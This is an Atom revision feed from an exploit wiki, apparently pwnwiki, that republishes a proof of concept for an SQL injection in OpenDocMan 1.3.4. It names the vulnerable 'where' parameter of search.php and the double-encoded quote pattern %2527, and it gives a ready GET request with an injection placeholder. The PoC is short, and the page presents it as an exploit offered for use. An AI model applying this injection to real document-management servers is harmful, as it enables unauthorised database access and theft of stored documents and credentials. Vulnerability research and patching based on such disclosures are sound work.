<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=OpenDocMan_1.3.4_-_%27search.php_where%27_SQL_%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E</id>
	<title>OpenDocMan 1.3.4 - 'search.php where' SQL 注入漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=OpenDocMan_1.3.4_-_%27search.php_where%27_SQL_%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=OpenDocMan_1.3.4_-_%27search.php_where%27_SQL_%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-08T08:55:19Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=OpenDocMan_1.3.4_-_%27search.php_where%27_SQL_%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;diff=2033&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; =========================================================================================== # Exploit Title: OpenDocMan 1.3.4 - ’where’ SQL Injection # CVE:...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=OpenDocMan_1.3.4_-_%27search.php_where%27_SQL_%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;diff=2033&amp;oldid=prev"/>
		<updated>2021-05-02T04:58:15Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; =========================================================================================== # Exploit Title: OpenDocMan 1.3.4 - ’where’ SQL Injection # CVE:...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
===========================================================================================&lt;br /&gt;
# Exploit Title: OpenDocMan 1.3.4 - ’where’ SQL Injection&lt;br /&gt;
# CVE: N/A&lt;br /&gt;
# Date: 05/03/2019&lt;br /&gt;
# Exploit Author: Mehmet EMIROGLU&lt;br /&gt;
# Vendor Homepage: https://sourceforge.net/projects/opendocman/files/&lt;br /&gt;
# Software Link: https://sourceforge.net/projects/opendocman/files/&lt;br /&gt;
# Version: v1.3.4&lt;br /&gt;
# Category: Webapps&lt;br /&gt;
# Tested on: Wamp64, @Win&lt;br /&gt;
# Software description: OpenDocMan is a web based document management&lt;br /&gt;
system (DMS) written in PHP designed&lt;br /&gt;
  to comply with ISO 17025 and OIE standard for document management.&lt;br /&gt;
  It features fine grained control of access to files, and automated&lt;br /&gt;
install and upgrades.&lt;br /&gt;
===========================================================================================&lt;br /&gt;
# POC - SQLi&lt;br /&gt;
# Parameters : where&lt;br /&gt;
# Attack Pattern : %2527&lt;br /&gt;
# GET Request :&lt;br /&gt;
http://localhost/opendocman/search.php?submit=submit&amp;amp;sort_by=id&amp;amp;where=[SQL Inject Here]&amp;amp;sort_order=asc&amp;amp;keyword=Training Manual&amp;amp;exact_phrase=on&lt;br /&gt;
===========================================================================================&lt;br /&gt;
            &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>